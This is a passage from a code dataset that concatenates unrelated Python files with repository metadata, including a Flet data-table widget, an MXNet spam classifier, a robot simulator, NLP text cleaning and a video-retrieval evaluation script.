self._original_model = model\n self.render_model(self._original_model)\n if self.config.create_text_model or self.config.search:\n self._text_model = model.with_columns(pl.col(\"*\").cast(pl.Utf8))\n\n def build(self) -> ft.Container:\n scroll = ft.ScrollMode.ADAPTIVE if not self.data_table.expand else None\n controls: list[ft.Control] = [\n ft.Row(\n [self.data_table],\n scroll=scroll,\n )\n ]\n if self.config.search:\n controls.insert(0, self.search_bar)\n return ft.Container(ft.Column(controls), border=ft.border.all(2))\n\n def render_model(self, model: pl.DataFrame) -> None:\n self.data_table.columns = [\n ft.DataColumn(ft.Text(column), on_sort=self.config.on_sort_column)\n for column in model.columns\n ]\n self.data_table.rows = [\n ft.DataRow(\n [self._get_cell(cell) for cell in row],\n on_select_changed=self.config.on_select_changed_row,\n on_long_press=self.config.on_long_press_row,\n )\n for row in model.rows()\n ]\n if self.page:\n self.update()\n\n def _get_cell(self, text: str) -> ft.DataCell:\n return ft.DataCell(\n ft.Text(text),\n on_long_press=self.config.on_long_press_cell,\n on_tap=self.config.on_tap_cell,\n on_double_tap=self.config.on_double_tap_cell,\n on_tap_cancel=self.config.on_tap_cancel_cell,\n on_tap_down=self.config.on_tap_down_cell,\n )\n\n def _setup_search_bar(self) -> None:\n self.search_field = self._get_search_field()\n self.column_dropdown = self._get_column_dropdown()\n self.search_bar = ft.Container(\n ft.Row(\n [\n self.column_dropdown,\n self.search_field,\n ],\n ),\n padding=ft.padding.all(10.0),\n )\n\n def _get_column_dropdown(self) -> ft.Dropdown:\n options = [\n ft.dropdown.Option(column_name, column_name)\n for column_name in self._text_model.columns\n ]\n return ft.Dropdown(\n options=options,\n value=str(options[self.config.search_column_default_index].key),\n )\n\n def _get_search_field(self) -> ft.Container:\n def clear(e: ft.ControlEvent) -> None:\n search_field.value = \"\"\n if self.page:\n self.render_model(self._text_model)\n search_field.focus()\n\n search_field = ft.TextField(expand=True, on_change=self._filter_model)\n clear_button = ft.IconButton(ft.icons.HIGHLIGHT_REMOVE, on_click=clear)\n return ft.Container(ft.Row([search_field, clear_button]), expand=True)\n\n def _filter_model(self, e: ft.ControlEvent) -> None:\n query = e.control.value\n if not query:\n self.render_model(self._text_model)\n return\n filtered_model = self._text_model.filter(\n pl.col(str(self.column_dropdown.value)).str.contains(query, literal=True)\n )\n self.render_model(filtered_model)\n\n\ndef main(page: ft.Page) -> None:\n\n model = pl.read_csv(\n file=\"https://raw.githubusercontent.com/iron3oxide/ndcc/main/ndcc/data/charts.csv\",\n infer_schema_length=300,\n )\n parent_config = DataTableConfig(expand=True)\n config = ModelDataTableConfig(\n search=True,\n search_column_default_index=1,\n )\n table = ModelDataTable(model=model, config=config, dt_config=parent_config)\n page.scroll = ft.ScrollMode.ADAPTIVE\n page.add(table)\n page.update()\n\n\nft.app(target=main)\n","repo_name":"iron3oxide/fletched","sub_path":"fletched/controls/datatable.py","file_name":"datatable.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"} +{"seq_id":"35355620847","text":"from __future__ import print_function\n\nimport argparse\nimport logging\nimport mxnet as mx\nfrom mxnet import gluon, autograd\nfrom mxnet.gluon import nn\nimport os\nimport numpy as np\nimport json\nimport time\nimport pandas\nimport shutil\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\n# ------------------------------------------------------------ #\n# Hosting methods #\n# ------------------------------------------------------------ #\n\ndef model_fn(model_dir):\n logger.info(f\"Preparing model from {model_dir}\")\n net = gluon.nn.SymbolBlock(\n outputs=mx.sym.load('{}/model.json'.format(model_dir)),\n inputs=mx.sym.var('data'))\n\n net.load_parameters(f'{model_dir}/model.params', ctx=mx.cpu())\n # net.load_params('{}/model.params'.format(model_dir), ctx=mx.cpu())\n\n logger.info(\"Model prepared!\")\n return net\n\n\ndef transform_fn(net, data, input_content_type, output_content_type):\n logger.info(f\"Received request:\\nData:{data}\\nInputContentType:{input_content_type}\\nOutputContentType:{output_content_type}\")\n try:\n parsed = json.loads(data)\n nda = mx.nd.array(parsed)\n \n output = net(nda)\n sigmoid_output = output.sigmoid()\n prediction = mx.nd.abs(mx.nd.ceil(sigmoid_output - 0.5))\n \n output_obj = {}\n output_obj['predicted_label'] = prediction.asnumpy().tolist()\n output_obj['predicted_probability'] = sigmoid_output.asnumpy().tolist()\n\n response_body = json.dumps(output_obj)\n return response_body, output_content_type\n except Exception as ex:\n response_body = '{error: }' + str(ex)\n logger.info(f\"Exception thrown: {response_body}\")\n return response_body, output_content_type\n\n\n\n# ------------------------------------------------------------ #\n# Training methods #\n# ------------------------------------------------------------ #\n\ndef save(net, model_dir, include_inference_code=True):\n y = net(mx.sym.var('data'))\n y.save('{}/model.json'.format(model_dir))\n net.collect_params().save('{}/model.params'.format(model_dir))\n \n if include_inference_code:\n src = os.path.dirname(os.path.abspath(__file__))\n dest = f'{model_dir}/code'\n logger.info(f'src: {src}')\n logger.info(f'dest: {dest}')\n shutil.copytree(src, dest)\n\ndef get_train_data(data_path, batch_size):\n logger.info('Train data path: ' + data_path)\n df = pandas.read_csv('{}/train.gz'.format(data_path))\n features = df[df.columns[1:]].values.astype(dtype=np.float32)\n labels = df[df.columns[0]].values.reshape((-1, 1)).astype(dtype=np.float32)\n \n return gluon.data.DataLoader(gluon.data.ArrayDataset(features, labels), batch_size=batch_size, shuffle=True)\n\ndef get_val_data(data_path, batch_size):\n logger.info('Validation data path: ' + data_path)\n df = pandas.read_csv('{}/val.gz'.format(data_path))\n features = df[df.columns[1:]].values.astype(dtype=np.float32)\n labels = df[df.columns[0]].values.reshape((-1, 1)).astype(dtype=np.float32)\n \n return gluon.data.DataLoader(gluon.data.ArrayDataset(features, labels), batch_size=batch_size, shuffle=False)\n\ndef test(ctx, net, val_data):\n metric = mx.metric.Accuracy()\n for data, label in val_data:\n data = data.as_in_context(ctx)\n label = label.as_in_context(ctx)\n \n output = net(data)\n sigmoid_output = output.sigmoid() \n prediction = mx.nd.abs(mx.nd.ceil(sigmoid_output - 0.5))\n \n metric.update([label], [prediction])\n return metric.get()\n\ndef define_network():\n net = nn.Sequential()\n with net.name_scope():\n net.add(nn.Dense(64, activation=\"relu\"))\n net.add(nn.Dense(1))\n return net\n\ndef train(\n current_host,\n hosts,\n num_cpus,\n num_gpus,\n training_dir,\n val_dir,\n model_dir,\n batch_size,\n epochs,\n learning_rate,\n momentum,\n log_interval):\n # SageMaker passes num_cpus, num_gpus and other args we can use to tailor training to\n # the current container environment, but here we just use simple cpu context.\n ctx = mx.cpu()\n\n # retrieve the hyperparameters and apply some defaults in case they are not provided.\n train_data = get_train_data(training_dir, batch_size)\n val_data = get_val_data(val_dir, batch_size)\n\n # define the network\n net = define_network()\n\n # Collect all parameters from net and its children, then initialize them.\n net.initialize(mx.init.Normal(sigma=1.), ctx=ctx)\n \n # Trainer is for updating parameters with gradient.\n if len(hosts) == 1:\n kvstore = 'device' if num_gpus > 0 else 'local'\n else:\n kvstore = 'dist_device_sync' if num_gpus > 0 else 'dist_sync'\n\n trainer = gluon.Trainer(net.collect_params(), 'adam',\n {'learning_rate': learning_rate},\n kvstore=kvstore)\n \n metric = mx.metric.Accuracy()\n loss = gluon.loss.SigmoidBinaryCrossEntropyLoss()\n\n for epoch in range(epochs):\n \n # reset data iterator and metric at begining of epoch.\n metric.reset()\n btic = time.time()\n for i, (data, label) in enumerate(train_data):\n # Copy data to ctx if necessary\n data = data.as_in_context(ctx)\n label = label.as_in_context(ctx)\n \n # Start recording computation graph with record() section.\n # Recorded graphs can then be differentiated with backward.\n with autograd.record():\n output = net(data)\n L = loss(output, label)\n L.backward()\n\n # take a gradient step with batch_size equal to data.shape[0]\n trainer.step(data.shape[0])\n\n # update metric at last.\n sigmoid_output = output.sigmoid() \n prediction = mx.nd.abs(mx.nd.ceil(sigmoid_output - 0.5))\n metric.update([label], [prediction])\n\n if i % log_interval == 0 and i > 0:\n name, acc = metric.get()\n logger.info('[Epoch %d Batch %d] Training: %s=%f, %f samples/s' %\n (epoch, i, name, acc, batch_size / (time.time() - btic)))\n\n btic = time.time()\n\n name, acc = metric.get()\n logger.info(f'[Epoch {epoch}] Training: {name}={acc}')\n\n name, val_acc = test(ctx, net, val_data)\n logger.info(f'[Epoch {epoch}] Validation: {name}={val_acc}')\n\n return net\n","repo_name":"tmmunroe/spam-detection","sub_path":"sagemaker_model/docker/code/spam_model.py","file_name":"spam_model.py","file_ext":"py","file_size_in_byte":6538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69919347048","text":"from math import pi, sin, cos, atan2, sqrt\nfrom tkinter import *\nfrom geom import *\n\n\n################################\n#tkinter drawing functions######\n################################\ndef create_circle(x, y, r, canvas): #center coordinates, radius\n x0 = x - r\n y0 = y - r\n x1 = x + r\n y1 = y + r\n canvas.create_oval(x0, y0, x1, y1,fill=\"white\",width=3)\n\n # canvas.create_line(rob.ultrasonic.x,rob.ultrasonic.y,500,500,fill=\"gray\",dash=(4, 2))\n \n \n\nclass Tether(object):\n def __init__(self, x, y):\n self.anchors = [Point(x,y)]\n def move(self, x, y):\n self.end = Point(x,y)\n def end(self):\n return self.anchors[-1]\n def addAnchor(self,anc):\n self.anchors.append(anc)\n self.length = self.getLength()\n def getLength(self):\n length = 0\n for a in range(len(self.anchors)):\n length += self.anchors[a].getDistance(self.anchors[a-1])\n return length\n def draw(self,canvas):\n count = len(self.anchors)-1\n for a in range(count):\n Line(self.anchors[a],self.anchors[a+1]).draw(canvas)\nclass Robot(Point):\n def __init__(self, x, y,radius,rotation,env,canvas):\n Point.__init__(self, x, y, radius)\n self.rotation = rotation\n self.sensor = Point(self.x+self.radius*cos(self.rotation), self.y+self.radius*sin(self.rotation))\n self.tether = Tether(x,y);\n self.env = env\n self.canvas = canvas\n def setV(self,velocity):\n self.velocity = velocity\n def setW(self,angular_velocity):\n self.angular_velocity = angular_velocity\n def getV(self):\n return self.velocity\n def getW(self):\n return self.angular_velocity\n def getRot(self):\n return self.rotation\n def stop(self):\n self.velocity = 0\n self.angular_velocity = 0\n def move(self,time=1):\n self.x = self.x + time*self.velocity*cos(self.rotation)\n self.y = self.y + time*self.velocity*sin(self.rotation)\n self.sensor = Point(self.x+self.radius*cos(self.rotation), self.y+self.radius*sin(self.rotation))\n self.rotation = self.rotation + time*self.angular_velocity\n self.redraw_scene()\n def action(self):\n pass\n def getRange(self,urange,angle):\n distance = urange\n p2 = Point(self.sensor.x + urange*cos(angle), self.sensor.y+urange*sin(angle))\n result = p2\n dline = Line(self.sensor,p2)\n for poly in self.env:\n cross_points,ind= dline.getPolygonIntersection(poly)\n for p in cross_points:\n if self.sensor.getDistance(p) < distance:\n distance = self.sensor.getDistance(p)\n result = p\n return result\n def getLaser(self,urange=200):\n return self.getRange(urange,self.rotation)\n \n def getUltrasonic(self,urange=200,cone_width=30):\n distance = urange\n result = self.getRange(urange,self.rotation)\n step = 1\n for degree in range(0,cone_width+1,step):\n angle = degree-cone_width/2\n angle = pi*(angle/180)\n angle = self.rotation - angle\n rpoint = self.getRange(urange,angle)\n rdistance = self.sensor.getDistance(rpoint)\n if rdistance < distance:\n distance = rdistance\n result = rpoint\n del angle, rpoint, rdistance\n del step, degree\n return result\n \n def getLIDAR(self,n,lrange=200):\n distances = []\n \n return distances\n \n def draw(self):\n urange=200\n create_circle(self.x, self.y, self.radius, self.canvas)\n create_circle(self.x + self.radius*cos(self.rotation), self.y + self.radius*sin(self.rotation), 3, self.canvas)\n #red line in robot to show rotation\n self.canvas.create_line(self.x,\n self.y,\n self.x+self.radius*cos(self.rotation),\n self.y+self.radius*sin(self.rotation),\n fill=\"red\",\n width=3)\n #dashed line to show ultrasonic detection###############\n xy = self.getLaser()\n if not xy==False:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n xy.x, xy.y,\n fill=\"gray\",\n dash=(4, 2))\n else:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n self.sensor.x + urange*cos(self.rotation), self.sensor.y+urange*sin(self.rotation),\n fill=\"gray\",\n dash=(4, 2))\n cone_width=30\n angle = self.rotation - pi*((cone_width/2)/180)\n xy = self.getRange(urange, angle)\n if not xy==False:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n xy.x, xy.y,\n fill=\"gray\",\n dash=(4, 2))\n else:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n self.sensor.x + urange*cos(angle), self.sensor.y+urange*sin(angle),\n fill=\"gray\",\n dash=(4, 2))\n angle = self.rotation + pi*((cone_width/2)/180)\n xy = self.getRange(urange, angle)\n if not xy==False:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n xy.x, xy.y,\n fill=\"gray\",\n dash=(4, 2))\n else:\n self.canvas.create_line(self.sensor.x, self.sensor.y,\n self.sensor.x + urange*cos(angle), self.sensor.y+urange*sin(angle),\n fill=\"gray\",\n dash=(4, 2))\n #tether lines############################################\n self.tether.draw(self.canvas)\n Line(self, self.tether.anchors[-1]).draw(self.canvas)\n def redraw_scene(self):\n self.canvas.delete(\"all\")\n for p in self.env:\n p.draw(self.canvas,\"red\")\n xy = self.getUltrasonic()\n if not xy==False:\n xy.draw(self.canvas)\n self.draw()\n self.canvas.update()\n def afterAction(self):\n pass\n def track(self):\n pass\n \n\n","repo_name":"bektasaykut/tether","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":6532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"14725795752","text":"import pygtk\nimport gtk\nimport librarytreeview\nimport playertreeview\nimport eventtreeview\n\nclass LibraryBrowser(gtk.Alignment):\n \n def __event_selection_changed(self, view):\n\n events = self.event_view.get_selected_events()\n \n self.library_view.clear_event_filters()\n \n if events is None:\n return\n \n for event in events:\n self.library_view.filter_event(event[0])\n \n def __player_selection_changed(self, view):\n players = self.player_view.get_selected_players()\n \n self.library_view.clear_player_filters()\n self.event_view.clear_filters()\n \n if players is None:\n return\n \n for player in players:\n self.event_view.filter_player(player[0])\n self.library_view.filter_player(player[0])\n \n def __sw(self, wid):\n sw = gtk.ScrolledWindow()\n sw.add(wid)\n return sw\n \n def __make_event_view(self):\n self.event_view = eventtreeview.EventTreeView()\n self.event_view.get_selection().connect(\"changed\", self.__event_selection_changed)\n return self.__sw(self.event_view)\n \n def __make_library_view(self):\n self.library_view = librarytreeview.LibraryTreeView()\n return self.__sw(self.library_view)\n\n def __make_player_view(self):\n self.player_view = playertreeview.PlayerTreeView()\n \n self.player_view.get_selection().connect(\"changed\", self.__player_selection_changed)\n return self.__sw(self.player_view)\n \n def __pack_widgets(self):\n vbox = gtk.VBox()\n hbox = gtk.HBox()\n \n lv = self.__make_library_view()\n pv = self.__make_player_view()\n ev = self.__make_event_view()\n \n hbox.pack_start(pv,True)\n hbox.pack_start(ev,True)\n \n vbox.pack_start(hbox,True)\n vbox.pack_start(lv,True)\n \n self.add(vbox)\n\n def __init__(self):\n gtk.Alignment.__init__(self)\n self.__pack_widgets()\n self.set(0,0,1,1)\n \n def get_selected_game (self):\n return self.library_view.get_selected_game()\n","repo_name":"strudlez/SDDFall2010--Team-Zamboni","sub_path":"zambogo/src/library/librarybrowser.py","file_name":"librarybrowser.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"70034906088","text":"import logging\nimport graphene\nfrom .. import api_access\nimport json\nfrom ..model.error_schema import ErrorsSchema\nfrom ..helpers.service_urls_helper import Helpers\n\n\n\nclass UpdateInstallationMutation(graphene.Mutation):\n\n def __init__(self, service_urls, x_user_agent, inputDict):\n self.schemaDict = {}\n self.http_status = None\n self.http_cause = None\n self.http_cause_is_json = False\n\n status, content = api_access.put_installations(service_urls, x_user_agent = x_user_agent, \n \tsecureToken = inputDict['secureToken'], \n \ttimestamp = inputDict['timestamp'], \n \tinstallationId = inputDict['installationId'], \n social_type = inputDict['socialType'],\n social_access_token = inputDict['socialAccessToken'],\n social_email = inputDict['socialEmail'],\n social_id = inputDict['socialId'],)\n if status == 200 or status == 201:\n self.schemaDict = json.loads(content)\n else:\n #error\n self.http_status = status\n try:\n self.http_cause = json.loads(content)\n self.http_cause_is_json = True\n except:\n self.http_cause = content\n\n class Input:\n installationId = graphene.String(required=True)\n secureToken = graphene.String(required=True)\n timestamp = graphene.String(required=True)\n socialType = graphene.String(required=True) \n socialAccessToken = graphene.String(required=True)\n socialEmail = graphene.String(required=True)\n socialId = graphene.String(required=True)\n\n userId = graphene.String() \n def resolve_userId(self, args, context, info):\n return self.schemaDict.get('userId')\n\n installationToken = graphene.String() \n def resolve_installationToken(self, args, context, info):\n return self.schemaDict.get('installationToken')\n\n errors = graphene.Field(ErrorsSchema) \n def resolve_errors(self, args, context, info):\n #logging.info('resolve_errors')\n return ErrorsSchema(self.http_status, self.http_cause, self.http_cause_is_json)\n \n \n def mutate(self, input, context, info):\n input_dict = {'installationId' : input.get('installationId'), \n 'secureToken' : input.get('secureToken'), \n 'timestamp' : input.get('timestamp'), \n 'socialType' : input.get('socialType'), \n 'socialAccessToken' : input.get('socialAccessToken'), \n 'socialEmail' : input.get('socialEmail'),\n 'socialId' : input.get('socialId') } \n return UpdateInstallationMutation(Helpers.get_service_urls(context), context['x_user_agent'], input_dict)","repo_name":"neilmca/gc_graphql","sub_path":"gae_graphql_server/gql/mutations/update_installation_mutation.py","file_name":"update_installation_mutation.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37773688793","text":"import re\nimport string\nimport nltk\nfrom nltk import PerceptronTagger\nfrom nltk.corpus import stopwords\n\ndef clean_text_simple(text, tagger, keep, stpwds, stemmer, remove_stopwords=True, pos_filtering=True, stemming=True):\n # convert to lower case\n text = text.lower()\n # remove punctuation (preserving intra-word dashes)\n tokens = tokenization(text)\n if pos_filtering == True and len(tokens) > 0:\n tokens = pos_tagging(tokens, tagger, keep)\n if remove_stopwords:\n # remove stopwords\n tokens = [token for token in tokens if token not in stpwds]\n if stemming:\n # apply Porter's stemmer\n tokens = map(stemmer.stem, tokens)\n return tokens\n\n\ndef pos_tagging(tokens, tagger, keep):\n # apply POS-tagging\n tagged_tokens = tagger.tag(tokens)\n # retain only nouns and adjectives\n tokens = [item[0] for item in tagged_tokens if item[1] in keep]\n return tokens\n\n\ndef tokenization(text):\n punct = string.punctuation.replace('-', '')\n cond = '[' + re.escape(punct) + ']+'\n text = re.sub(cond, ' ', text)\n text = re.sub('(\\s+-|-\\s+)', ' ', text)\n # strip extra white space\n text = re.sub('-{2,}', ' ', text)\n text = re.sub('\\s+', ' ', text)\n # strip leading and trailing white space\n text = text.strip()\n # tokenize (split based on whitespace)\n tokens = text.split(' ')\n tokens = filter(lambda x: len(x) > 0, tokens)\n return tokens\n\n\ndef clean(X, col = 'body', cleaner = clean_text_simple, join = True):\n X_cleaned = X.copy()\n tagger = PerceptronTagger()\n keep = set(['NN', 'NNS', 'NNP', 'NNPS', 'JJ', 'JJS', 'JJR'])\n stpwds = set(stopwords.words('english'))\n stemmer = nltk.stem.PorterStemmer()\n X_cleaned[col] = X_cleaned[col].apply(lambda x: cleaner(x, tagger, keep, stpwds, stemmer))\n if join:\n X_cleaned[col] = X_cleaned[col].apply(lambda x: ' '.join(x))\n return X_cleaned","repo_name":"abyoussef/ALTEGRAD_Challenge","sub_path":"helpers/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44126946995","text":"import base64\nfrom io import BytesIO\nfrom pathlib import Path\n\nfrom .resources.bad_news import bad_news\nfrom .resources.good_news import good_news\n\n\nfrom mahiro import GroupMessageMahiro\n\nbad_news_prefix = '悲报 '\ngood_news_prefix = '喜报 '\n\ndef byte_to_base64(byte: BytesIO):\n return base64.b64encode(byte.getvalue()).decode()\n\ndef byte_save(byte: BytesIO, path: str):\n with open(path, 'wb') as f:\n f.write(byte.getvalue())\n\ncache_dir = Path(__file__).parent / 'cache'\ncache_dir.mkdir(exist_ok=True)\n\nasync def memes(mahiro: GroupMessageMahiro):\n is_text = mahiro.extra.is_text\n if not is_text:\n return\n \n output = None\n msg = mahiro.ctx.msg.Content.strip()\n if msg.startswith(good_news_prefix):\n text = msg.replace(good_news_prefix, '')\n output = good_news(None, [text], None)\n if msg.startswith(bad_news_prefix):\n text = msg.replace(bad_news_prefix, '')\n output = bad_news(None, [text], None)\n if output:\n base64_str = byte_to_base64(output)\n mahiro.sender.send_to_group(\n group_id=mahiro.ctx.groupId,\n fast_image=base64_str\n )","repo_name":"opq-osc/mahiro","sub_path":"python/plugins/memes/memes.py","file_name":"memes.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"3987606213","text":"import torch\nimport utils\nimport argparse\nimport numpy as np\n\nfrom tqdm import tqdm\nfrom torch.utils.data import DataLoader\nfrom datasets.generators import DatasetGenerator\nfrom model.students import FineGrainedStudent, CoarseGrainedStudent\n\n\n@torch.no_grad()\ndef calculate_similarities_to_queries(model, queries, target, args):\n similarities = []\n batch_sz = 2048 if 'batch_sz_sim' not in args else args.batch_sz_sim\n for i, query in enumerate(queries):\n if query.device.type == 'cpu':\n query = query.to(args.gpu_id)\n sim = []\n for b in range(target.shape[0]//batch_sz + 1):\n batch = target[b*batch_sz: (b+1)*batch_sz]\n if batch.shape[0] >= 4:\n sim.append(model.calculate_video_similarity(query, batch))\n sim = torch.mean(torch.cat(sim, 0))\n similarities.append(sim.cpu().numpy())\n return similarities \n \n \n@torch.no_grad()\ndef query_vs_target(model, dataset, args):\n # Create a video generator for the queries\n generator = DatasetGenerator(args.dataset_hdf5, dataset.get_queries())\n loader = DataLoader(generator, num_workers=args.workers, collate_fn=utils.collate_eval)\n\n # Extract features of the queries\n all_db, queries, queries_ids = set(), [], []\n print('\\n> Extract features of the query videos')\n for video in tqdm(loader):\n video_features = video[0][0]\n video_id = video[2][0]\n if video_id:\n features = model.index_video(video_features.to(args.gpu_id))\n if 'load_queries' in args and not args.load_queries: features = features.cpu()\n all_db.add(video_id)\n queries.append(features)\n queries_ids.append(video_id)\n\n # Create a video generator for the database video\n generator = DatasetGenerator(args.dataset_hdf5, dataset.get_database())\n loader = DataLoader(generator, num_workers=args.workers, collate_fn=utils.collate_eval)\n \n # Calculate similarities between the queries and the database videos\n similarities = dict({query: dict() for query in queries_ids})\n print('\\n> Calculate query-target similarities')\n for video in tqdm(loader):\n video_features = video[0][0]\n video_id = video[2][0]\n if video_id:\n features = model.index_video(video_features.to(args.gpu_id))\n sims = calculate_similarities_to_queries(model, queries, features, args)\n all_db.add(video_id)\n for i, s in enumerate(sims):\n similarities[queries_ids[i]][video_id] = float(s)\n \n print('\\n> Evaluation on {}'.format(dataset.name))\n return dataset.evaluate(similarities, all_db)\n\n \n@torch.no_grad()\ndef queries_vs_database(model, dataset, args):\n # Create a video generator for the queries\n generator = DatasetGenerator(args.dataset_hdf5, dataset.get_queries())\n loader = DataLoader(generator, batch_size=args.batch_sz, num_workers=args.workers, collate_fn=utils.collate_eval)\n\n # Extract features of the queries\n all_db, queries, queries_ids = set(), [], []\n print('\\n> Extract features of the query videos')\n for video in tqdm(loader):\n video_id = np.array(video[2])\n video_features = video[0][video_id != '']\n video_mask = video[1][video_id != '']\n video_id = video_id[video_id != '']\n if len(video_id) > 0:\n video_features = model.index_video(video_features.to(args.gpu_id), video_mask.to(args.gpu_id))\n all_db.update(video_id)\n queries.append(video_features)\n queries_ids.extend(video_id)\n queries = torch.cat(queries, 0)\n \n # Create a video generator for the database video\n generator = DatasetGenerator(args.dataset_hdf5, dataset.get_database())\n loader = DataLoader(generator, batch_size=args.batch_sz, num_workers=args.workers, collate_fn=utils.collate_eval)\n \n # Extract features of the targets\n targets, targets_ids = [], []\n print('\\n> Extract features of the target videos')\n for video in tqdm(loader):\n video_id = np.array(video[2])\n video_features = video[0][video_id != '']\n video_mask = video[1][video_id != '']\n video_id = video_id[video_id != '']\n if len(video_id) > 0:\n video_features = model.index_video(video_features.to(args.gpu_id), video_mask.to(args.gpu_id))\n all_db.update(video_id)\n targets.append(video_features)\n targets_ids.extend(video_id)\n targets = torch.cat(targets, 0)\n \n # Calculate similarities between the queries and the database videos\n print('\\n> Calculate query-target similarities')\n sims = model.calculate_video_similarity(queries, targets).cpu().numpy()\n similarities = dict({query: dict() for query in queries_ids})\n for i in range(sims.shape[0]):\n for j in range(sims.shape[1]):\n similarities[queries_ids[i]][targets_ids[j]] = float(sims[i, j])\n\n print('\\n> Evaluation on {}'.format(dataset.name))\n return dataset.evaluate(similarities, all_db)\n\n \nif __name__ == '__main__':\n formatter = lambda prog: argparse.ArgumentDefaultsHelpFormatter(prog, max_help_position=80)\n parser = argparse.ArgumentParser(description='This is the code for the evaluation of the trained student on five datasets.', formatter_class=formatter)\n parser.add_argument('--dataset', type=str, required=True, choices=[\"FIVR-200K\", \"FIVR-5K\", \"CC_WEB_VIDEO\", \"SVD\", \"EVVE\"],\n help='Name of evaluation dataset.')\n parser.add_argument('--dataset_hdf5', type=str, required=True, \n help='Path to hdf5 file containing the features of the evaluation dataset')\n parser.add_argument('--student_path', type=str, default=None,\n help='Path to a trained student network. If it is not provided, then the pretrained weights are used with the default architecture.')\n parser.add_argument('--student_type', type=str, default='fine-grained', choices=['fine-grained', 'coarse-grained'], \n help='Type of the student network.')\n parser.add_argument('--attention', type=utils.bool_flag, default=False,\n help='Boolean flag indicating whether a Fine-grained Attention Student will be used.')\n parser.add_argument('--binarization', type=utils.bool_flag, default=False, \n help='Boolean flag indicating whether a Fine-grained Binarization Student will be used.')\n parser.add_argument('--batch_sz', type=int, default=32,\n help='Number of videos processed in each batch. Aplicable only with Coarse-greained Students.')\n parser.add_argument('--batch_sz_sim', type=int, default=2048,\n help='Number of feature tensors in each batch during similarity calculation.')\n parser.add_argument('--gpu_id', type=int, default=0,\n help='ID of the GPU used for the student evaluation.')\n parser.add_argument('--load_queries', type=utils.bool_flag, default=True,\n help='Boolean flag indicating whether the query features will be loaded to the GPU memory. Aplicable only for Fine-grained Students.')\n parser.add_argument('--workers', type=int, default=8,\n help='Number of workers used for video loading.')\n args = parser.parse_args()\n\n if 'CC_WEB' in args.dataset:\n from datasets import CC_WEB_VIDEO\n dataset = CC_WEB_VIDEO()\n elif 'FIVR' in args.dataset:\n from datasets import FIVR\n dataset = FIVR(version=args.dataset.split('-')[1].lower())\n elif 'EVVE' in args.dataset:\n from datasets import EVVE\n dataset = EVVE()\n elif 'SVD' in args.dataset:\n from datasets import SVD\n dataset = SVD()\n\n print('\\n> Loading network')\n if args.student_path is not None:\n d = torch.load(args.student_path, map_location='cpu')\n student_args = d['args']\n if student_args.student_type == 'fine-grained':\n model = FineGrainedStudent(**vars(student_args))\n eval_function = query_vs_target\n elif student_args.student_type == 'coarse-grained':\n model = CoarseGrainedStudent(**vars(student_args))\n eval_function = queries_vs_database\n model.load_state_dict(d['model'])\n else:\n if args.student_type == 'fine-grained':\n if not args.attention and not args.binarization:\n raise Exception('No pretrained network for the given inputs. Provide either `--attention` or `--binarization` arguments as true for the pretrained fine-grained students.')\n model = FineGrainedStudent(attention=args.attention,\n binarization=args.binarization,\n pretrained=True)\n eval_function = query_vs_target\n elif args.student_type == 'coarse-grained':\n model = CoarseGrainedStudent(pretrained=True)\n eval_function = queries_vs_database\n model = model.to(args.gpu_id)\n model.eval()\n\n print(model)\n\n eval_function(model, dataset, args)\n","repo_name":"mever-team/distill-and-select","sub_path":"evaluation_student.py","file_name":"evaluation_student.py","file_ext":"py","file_size_in_byte":9127,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"53"} +{"seq_id":"33039869828","text":"import os\nimport sys\nsys.path.append(os.path.abspath(os.curdir))\n\nfrom yuan_api.inspurai import Yuan, set_yuan_account,Example\n\n# 1. set account\n# set_yuan_account(\"账号\", \"手机号\") # 输入您申请的账号和手机号\n\n# 2. initiate yuan api\n# 注意:engine必需是['base_10B','translate','dialog','rhythm_poems']之一,'base_10B'是基础模型,'translate'是翻译模型,'dialog'是对话模型,'rhythm_poems'是古文模型\nyuan = Yuan(engine='base_10B',\n input_prefix=\"内容:\",\n input_suffix=\"\",\n output_prefix=\"文章标题:\",\n output_suffix=\"。\",\n topK=5,\n temperature=0.1,\n max_tokens=30,\n topP=0.6,\n append_output_prefix_to_query=False)\n\n# 3. add examples if in need.\nyuan.add_example(Example(inp=\"截至5月27日,今年西部陆海新通道海铁联运班列开行3173列,累计约15.9万标箱,同比增长33%,完成上半年开行3150列的阶段性任务目标,提前1个月完成“双过半”任务。今年前4月,RCEP成员国经西部陆海新通道发运22111标箱,占通道到发总运量17.6%,外贸到发运量51482标箱,同比增长58.5%。\",\n out=\"西部陆海新通道海铁联运班列提前完成上半年目标任务。\"))\n\nprint(\"====摘要生成====\")\n\nwhile(1):\n print(\"输入Q退出\")\n prompt = input(\"内容:\")\n if prompt.lower() == \"q\":\n break\n response = yuan.submit_API(prompt=prompt,trun=\"。\")\n print(response+\"。\")\n","repo_name":"Shawn-Inspur/Yuan-1.0","sub_path":"yuan_api/examples/abstraction_gen.py","file_name":"abstraction_gen.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"zh","doc_type":"code","stars":588,"dataset":"github-code","pt":"53"} +{"seq_id":"70544358568","text":"from flask import Flask, request\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\napp = 